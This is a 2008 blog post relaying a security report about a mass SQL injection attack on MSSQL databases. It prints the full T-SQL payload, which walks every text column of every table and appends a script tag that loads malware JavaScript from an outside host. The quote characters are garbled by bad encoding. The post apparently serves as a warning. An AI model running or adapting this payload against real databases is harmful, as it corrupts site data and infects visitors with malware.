TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Author: webmaestro

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=â€™uâ€™ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(â€™update ['+@T+'] set ['+@C +']=['+@C+']+â€â€></title><script src=â€http://www.domain.com/malware/ w.jsâ€></script><!â€“â€ where â€˜+@C+â€™ not like â€%â€></title><script src=â€http://www.domain.com/malware/w.js â€œ></script><!â€“â€â€™)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Â TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Tags: database, hack

This entry was posted on Tuesday, August 12th, 2008 at 1:32 pm and is filed under Hacks, News, Windoze, database, security, whoa!. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Comments are closed.

S	M	T	W	T	F	S
« Apr
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

ourlil.com

TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Pages

Archives

Categories

Favorites

Meta